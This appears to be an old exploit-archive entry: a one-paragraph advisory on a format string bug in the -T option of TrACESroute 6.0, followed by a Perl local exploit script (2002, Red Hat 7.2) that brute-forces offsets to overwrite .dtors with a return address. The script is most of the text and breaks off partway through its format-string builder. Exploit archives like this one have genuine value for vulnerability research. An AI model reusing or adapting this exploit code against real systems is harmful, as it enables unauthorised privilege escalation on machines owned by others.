A format string vulnerability exists in TrACESroute. The problem exists in the terminator (-T) function of the program. Due to improper use of the fprintf function, an attacker may be able to supply a malicious format string to the program that reults in writing of attacker-supplied values to arbitrary locations in memory.
#!/usr/bin/perl
## ---/ tracesex.pl /---------------------------------------------------
##
## TrACESroute 6.0 GOLD local format string exploit
## * tested on Red Hat Linux release 7.2 (Enigma)
## * Jun 12 2002
##
## Author: stringz // thc@drug.org
## Vulnerability discovered by: downbload // downbload@hotmail.com
##
## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com
##
## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
## obscure, jove, rachel, kevin, and all of my 2e2h friends.
##
## ---/ powered by pot /-----------------------------------------------
for (1 .. 300) {
$fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
die("\x0a") if (system("$vuln -T $fmt_str localhost"))
=~ m/^(0|256|512|32512)$/; # may need a tweak ;)
}
sub
sw_fmtstr_create ($$$)
{
die("Incorrect number of arguments for sw_fmtstr_create")
unless @_ == 3;
my ($dest_addr, $ret_addr, $dist) = @_;
my ($word, $qword) = (2, 8);
# $dest_addr = where to write $ret_addr
# $ret_addr = where to return execution
# $dist = the calculated distance